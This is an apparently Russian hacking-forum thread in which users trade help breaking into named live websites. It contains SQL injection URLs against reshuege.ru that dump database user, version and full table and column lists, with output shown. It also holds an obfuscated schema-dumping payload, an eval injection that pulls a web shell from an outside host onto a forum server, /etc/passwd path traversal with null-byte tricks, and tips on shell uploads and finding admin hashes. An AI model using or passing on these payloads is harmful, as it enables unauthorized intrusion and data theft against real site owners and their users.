Ваши вопросы по уязвимостям.

http://forum.antichat.ru/thread312513.html

 

В такой ситуации как залить шелл, или это безнадежно?

Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?

http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php

Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1

 

через file_put_contents залей форму upload а, дальше шелл..

 

Как заливать шеллы, используя плохую настройку .htaccess?

 

А по точнее? Например, если льеш файл .php, а он через скрипт ренеймится в 4341843438121354131_file.php, можно полистать папки

.

 

http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ? Просто параметр проходит через функцию int(), и поэтому результат не увидеть (

 

такой вопрос, в пхп инъекции:
Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd.str - это без нул байта
а вот это с нул байтом
Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd\0.str)
вопрос как еще можно отрезать "0.str"?

 

2bodrich,

Code:

http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--+f

Code:

[COLOR=DarkOrange]root[/COLOR]@localhost:problems:5.1.49-3

Full Path:

Code:

/var/www/reshuege.ru/

Вообщем можно много чего вытащить ^_^ Походу папка /psprav/
доступна на запись.

2pirat0,
4096 слешей пробуй.

UPD. Нет(

 

2Ereee не канает, еще может какие то мысли?

 

есть сайт с инъекцией. дальше вывода informaton.schemA не смог уйти.
тут светить не хочу, если кто помочь сможет - в личку пожалст.
Haviji и еще пару средств раскрутки скулей так же не смогли мне помочь
так что, думаю это мб только зелененьким позубам)

 

Ereee, спасибо ! И еще вопрос, список всех таблиц узнал

А вот что либо вытянуть не получается, ошибка

 

может profiles в другой бд. какое поле ты хочешь вытянуть если у тебя только список таблиц есть? сливать нужно не только table_name но и table_schema и column_name и всё это, естественно брать не из ..schema.tables, а из ..schema.columns

 

Вот так все выведет:

Code:

http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_schema!='information_schema'--+

Лимитов не надо, из-за особенности скрипта на сайте. Ввиде:
база:таблица:столбцы

 

concat_ws трушней. concat не выведет ничего если хоть одно поле null

 

есть файл формата .dat , при открытии хекс редактором, вылетает какая то херня. Вопрос: Возможно ли привести к норм виду?

 

Ты про 0 и 1? Файл .dat может быть оказатся чем угодно, впрочем как и другие файлы. Если размер велик, то пробуй видео-проигрывателем.

 

вид вот такой

Code:

њ‡*XЌ>S:Nўn(°эYЫ"њФ–Qўg)}NJтj»•®"	Ђ&r_пґШ^‹Х) Ь_VШGBФ^iџN:/AЬ?ЦШ!»qYCЉд<©0Ж"0‚и)и|P]|іжЪI°Љ›n.МN9µ$G…*щE¦ЩДѕ.ё‡ь‰·ґЙpѕpЁB37чХ°_нМнїYM3  5Ељѓ¬№(pЬЫ‘jf%ZPвёH:V¤§`Ј6IHGFk°iqMїЮ'ґfћR  ошЩЗбp»ш…iјюЎoж»‘ЅЅК»$
КKхnНэОћЅж|Пaг8kIрв  цЃєD6аЗ…„8-Ґѓ6Kё4’,И*ыЗ®кWc©#&Џ‰А  nчb‡В•™QAKЖ<9"ЖRvљ`Ѓнъ[їдK°!‰x.Q'¶)Ч}Ь_…Ыы

 

здрасте, вопрос такой, вот допустим раскрутил я скуля, нашол таблицу с users выдрал от туда запись с id=1, росшыфровал хеш, (при том что использовал запрос типа like '%pas%', выдало мне одну единственную таблицу, тоисть у других поля password нет, но потом я все же перебрал таблицы, действительно записи юзверей хранятся только в этой таблице) захожу в админку - меня не пускает(пробывал не только с id=1),как оказалось это таблица аворизации на самом сайте,тоисть клиенты, в чем может быть подвох? версия скуля 5.0.51a-24+lenny5, админка - CMS Terminator Engine, и где искать хеш админа??

 

2Cherep,
открой любой бинарный файл блокнотом, увидишь то же самое. Откуда файл?

2pirat0,
Хорошо было бы, если скульи выложишь в теме. Но возможно, что пасс админа хранится в файле, а это облом. В выводимый столбц вставь запрос:

Code:

(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)

Там вид база:table:column. Найти что-то типа user_rights, user_permisson, admin_user и т.п. Удачи!

 

2Ereee,
я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?